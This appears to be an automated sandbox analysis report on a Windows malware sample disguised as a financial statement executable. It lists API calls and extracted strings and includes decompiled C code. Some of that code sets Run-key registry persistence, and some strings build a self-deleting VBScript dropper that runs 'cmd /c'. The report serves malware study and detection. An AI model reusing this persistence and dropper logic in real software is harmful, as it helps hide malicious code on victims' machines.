                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040810B
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408114
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040811D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408126
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040812F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408138
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 0040814B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,0041BA28,00000000), ref: 00408163
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040816E
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040817B
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408188
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408194
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040819D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081A6
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081AF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081B8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081C1
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 004081CF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081DB
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004081E5
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081F1
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040820F
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040821C
                                        • exit.KERNELBASE ref: 00408228
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408231
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040823A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$G@2@@0@Hstd@@V?$basic_string@$?c_str@?$basic_string@$V01@V10@$??0?$basic_string@G@1@@$V01@@$??4?$basic_string@$FileY?$basic_string@$V10@0@wcslen$AttributesCopy$?length@?$basic_string@CreateDirectoryExecuteShell_wgetenvexitwcscmp
                                        • String ID: """, 0$6$C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                        • API String ID: 740851534-1698755560
                                        • Opcode ID: 80ca90505373cb20a372e0dccba6a955caa600ae38e6392ff00b4d7c266a472e
                                        • Instruction ID: 2c5ee03a622c4f430e0af795343514bbf493609e2573cf328c1cc28c00924062
                                        • Opcode Fuzzy Hash: 80ca90505373cb20a372e0dccba6a955caa600ae38e6392ff00b4d7c266a472e
                                        • Instruction Fuzzy Hash: 57C15D7290051DEBCB04AFE0EC49DEE7B3CFF54345B44802AF916A71A0EB789945CB98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004135DE, Relevance: 68.4, APIs: 31, Strings: 8, Instructions: 148COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00413626
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?,WinDir), ref: 0041365D
                                        • _wgetenv.MSVCRT ref: 0041366D
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00413678
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00413683
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041368F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413698
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136A1
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136AA
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?,WinDir), ref: 004136BE
                                        • _wgetenv.MSVCRT ref: 004136CE
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004136D9
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004136E4
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004136F0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136F9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413702
                                        • _wgetenv.MSVCRT ref: 00413720
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00000000), ref: 0041372B
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000208,0041BCB0), ref: 00413741
                                        • GetLongPathNameW.KERNELBASE(00000000), ref: 00413748
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041375A
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415A24,?,00000000), ref: 0041376D
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z.MSVCP60(?,00000000,?,00000000), ref: 00413783
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041378E
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041379A
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137A5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137AE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137B7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@G@1@@$??4?$basic_string@G@2@@0@Hstd@@V01@V10@0@V?$basic_string@$V01@@_wgetenv$?c_str@?$basic_string@LongNamePath
                                        • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                        • API String ID: 1999370131-1609423294
                                        • Opcode ID: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                        • Instruction ID: 55aa70349295c49f58eee01d6a61984d570a68084dfe302b191afe96af195224
                                        • Opcode Fuzzy Hash: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                        • Instruction Fuzzy Hash: 4451FCB280150EEBCB05DF90ED59DEEB778EF54345B208066F912E3090EB746B49CB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00407D53, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 82COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 68%
                                        			E00407D53(void* __ecx, char _a4, char _a8, char _a12, char _a16) {
				char _v20;
				void* _t13;
				void* _t15;
				char* _t26;
				void* _t27;
				void* _t32;
				void* _t35;

				_t26 = "\"";
				if(_a4 == 1) {
					_t35 = _t27 - 0x10;
					L0041416A();
					L00414146();
					_t3 =  &_a16; // 0x415a24
					_t13 = E0040B7B9(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t3, _t35,  &_v20,  &_v20, _t26, 0x41ba28); // executed
					_t27 = _t35 + 0x38;
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
				}
				if(_a8 == 1) {
					_t32 = _t27 - 0x10;
					L0041416A();
					L00414146();
					_t7 =  &_a16; // 0x415a24
					_t13 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t7, _t32,  &_v20,  &_v20, _t26, 0x41ba28);
					_t27 = _t32 + 0x38;
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
				}
				if(_a12 == 1) {
					L0041416A();
					L00414146();
					_t15 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _a16, _t27 - 0x10,  &_v20,  &_v20, _t26, 0x41ba28);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
					return _t15;
				}
				return _t13;
			}










                                        0x00407d60
                                        0x00407d6a
                                        0x00407d71
                                        0x00407d7a
                                        0x00407d84
                                        0x00407d8c
                                        0x00407d99
                                        0x00407d9e
                                        0x00407da4
                                        0x00407da4
                                        0x00407dae
                                        0x00407db5
                                        0x00407dbe
                                        0x00407dc8
                                        0x00407dd0
                                        0x00407ddd
                                        0x00407de2
                                        0x00407de8
                                        0x00407de8
                                        0x00407df2
                                        0x00407e02
                                        0x00407e0c
                                        0x00407e21
                                        0x00407e2c
                                        0x00000000
                                        0x00407e2c
                                        0x00407e36

                                        APIs
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe), ref: 00407DA4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24,?,00408003), ref: 00407D84
                                          • Part of subcall function 0040B7B9: RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                          • Part of subcall function 0040B7B9: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28), ref: 0040B7D5
                                          • Part of subcall function 0040B7B9: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28), ref: 0040B7E3
                                          • Part of subcall function 0040B7B9: RegSetValueExW.KERNELBASE(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                          • Part of subcall function 0040B7B9: RegCloseKey.ADVAPI32(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28), ref: 0040B801
                                          • Part of subcall function 0040B7B9: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 0040B810
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 00407DBE
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 00407DC8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe), ref: 00407DE8
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 00407E02
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 00407E0C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe), ref: 00407E2C
                                        Strings
                                        • C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe, xrefs: 00407D5F
                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00407E17
                                        • $ZA, xrefs: 00407DD0, 00407D8C
                                        • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407D8F, 00407DD3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: G@std@@U?$char_traits@V?$allocator@$G@2@@0@G@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@V10@@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                        • String ID: $ZA$C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\
                                        • API String ID: 111787555-2646173673
                                        • Opcode ID: 0cb525aa58568e824a8d200d7c719720f3b78d1802e43ba3bcba88e74aab0662
                                        • Instruction ID: d86c43b3a5ba32eb059a2cdc2ec90b1b4ffa6c8f934f2ed61d0225c93748e370
                                        • Opcode Fuzzy Hash: 0cb525aa58568e824a8d200d7c719720f3b78d1802e43ba3bcba88e74aab0662
                                        • Instruction Fuzzy Hash: EE215A72D00114BBD710BAA69C4AEFB7F2CDF91354F440429F91962182E6BA8994C7E6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004129EB, Relevance: 21.1, APIs: 14, Instructions: 85COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                        • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,69D65DF0), ref: 00412A90
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A9A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AA3
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$?length@?$basic_string@V12@$??4?$basic_string@?substr@?$basic_string@V01@V01@@$??0?$basic_string@?find@?$basic_string@D@1@@
                                        • String ID:
                                        • API String ID: 3435050692-0
                                        • Opcode ID: cf897032fafc8a7a18bc323011148a7a1d4392e457d1882d7af56b3e3f1ca591
                                        • Instruction ID: d00c3f8f62f9657134ffe5fc931faad8ab4b4020c85508924df81fb6bcd52547
                                        • Opcode Fuzzy Hash: cf897032fafc8a7a18bc323011148a7a1d4392e457d1882d7af56b3e3f1ca591
                                        • Instruction Fuzzy Hash: F631BB7250050EEBCB04EFA0E959CDE7778EF94745B108066F812E7160EB74AB49CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00413FA4, Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 79%
                                        			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t24;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t54;
				intOrPtr _t57;
				intOrPtr _t60;

				_push(0xffffffff);
				_push(0x416e50);
				_push(0x414130);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t57;
				_v28 = _t57 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x41c26c =  *0x41c26c | 0xffffffff;
				 *0x41c270 =  *0x41c270 | 0xffffffff;
				 *(__p__fmode()) =  *0x41c264;
				_t24 = __p__commode();
				_t47 =  *0x41c260;
				 *_t24 =  *0x41c260;
				 *0x41c268 = _adjust_fdiv;
				_t27 = E00404F3A( *_adjust_fdiv);
				_t60 =  *0x41b190; // 0x1
				if(_t60 == 0) {
					__setusermatherr(E0041412C);
					_pop(_t47);
				}
				E0041411A(_t27);
				_push(0x41b0e8);
				_push(0x41b0e4);
				L00414114();
				_v112 =  *0x41c25c;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x41c258,  &_v112);
				_push(0x41b0e0);
				_push(0x41b000); // executed
				L00414114(); // executed
				_t54 =  *_acmdln;
				_v120 = _t54;
				if( *_t54 != 0x22) {
					while(1) {
						__eflags =  *_t54 - 0x20;
						if(__eflags <= 0) {
							goto L7;
						}
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				} else {
					do {
						_t54 = _t54 + 1;
						_v120 = _t54;
						_t42 =  *_t54;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t54 == 0x22) {
						L6:
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				}
				L7:
				_t36 =  *_t54;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_t68 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E00408C98(_t47, _t68, GetModuleHandleA(0), 0, _t54, _t38); // executed
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0041410E();
				return _t41;
			}

























                                        0x00413fa7
                                        0x00413fa9
                                        0x00413fae
                                        0x00413fb9
                                        0x00413fba
                                        0x00413fc7
                                        0x00413fcc
                                        0x00413fd1
                                        0x00413fd8
                                        0x00413fdf
                                        0x00413ff2
                                        0x00413ff4
                                        0x00413ffa
                                        0x00414000
                                        0x00414009
                                        0x0041400e
                                        0x00414013
                                        0x00414019
                                        0x00414020
                                        0x00414026
                                        0x00414026
                                        0x00414027
                                        0x0041402c
                                        0x00414031
                                        0x00414036
                                        0x00414040
                                        0x00414059
                                        0x0041405f
                                        0x00414064
                                        0x00414069
                                        0x00414076
                                        0x00414078
                                        0x0041407e
                                        0x004140ba
                                        0x004140ba
                                        0x004140bd
                                        0x00000000
                                        0x00000000
                                        0x004140bf
                                        0x004140c0
                                        0x004140c0
                                        0x00414080
                                        0x00414080
                                        0x00414080
                                        0x00414081
                                        0x00414084
                                        0x00414086
                                        0x00414091
                                        0x00414093
                                        0x00414093
                                        0x00414094
                                        0x00414094
                                        0x00414091
                                        0x00414097
                                        0x00414097
                                        0x0041409b
                                        0x00000000
                                        0x00000000
                                        0x004140a1
                                        0x004140a8
                                        0x004140ae
                                        0x004140b2
                                        0x004140c7
                                        0x004140b4
                                        0x004140b4
                                        0x004140b4
                                        0x004140d3
                                        0x004140d8
                                        0x004140dc
                                        0x004140e2
                                        0x004140e7
                                        0x004140e9
                                        0x004140ec
                                        0x004140ed
                                        0x004140ee
                                        0x004140f5

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                        • String ID:
                                        • API String ID: 801014965-0
                                        • Opcode ID: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                        • Instruction ID: 203440f8f63e4a3495bc52082528d8eb2041b3e21c5ddc4624b2c062dd02aed8
                                        • Opcode Fuzzy Hash: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                        • Instruction Fuzzy Hash: 92416DB1D40708EFDB209FA5DC89AEA7FB8EB49710F20412FE95197291D7784880CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409823, Relevance: 12.1, APIs: 8, Instructions: 81COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 53%
                                        			E00409823(intOrPtr _a4) {
				unsigned int _v8;
				signed char* _v12;
				char _v13;
				void* _v20;
				void* _v24;
				char _v40;
				void* _v56;
				char _v1080;
				void* _t36;
				signed int _t38;
				signed int _t42;
				int _t51;
				signed int _t54;
				signed int _t55;
				signed int _t66;
				signed char* _t76;
				void* _t83;
				void* _t88;
				void* _t89;

				_v12 = _v12 & 0x00000000;
				_v8 = E00409D02( &_v12);
				_t51 =  *_v12 & 0x000000ff;
				_t36 = malloc(_t51);
				_t76 = _v12;
				_t54 = _t51;
				_t7 = _t76 + 1; // 0x1
				_t88 = _t7;
				_v24 = _t36;
				_t55 = _t54 >> 2;
				memcpy(_t36, _t88, _t55 << 2);
				_t38 = memcpy(_t88 + _t55 + _t55, _t88, _t54 & 0x00000003);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t38, _t51,  &_v13);
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t38);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				_v8 = _v8 + (_t38 | 0xffffffff) - _t51;
				_t83 = malloc(_v8);
				_t42 = _v12;
				_v20 = _t83;
				_t20 = _t42 + 1; // 0x1
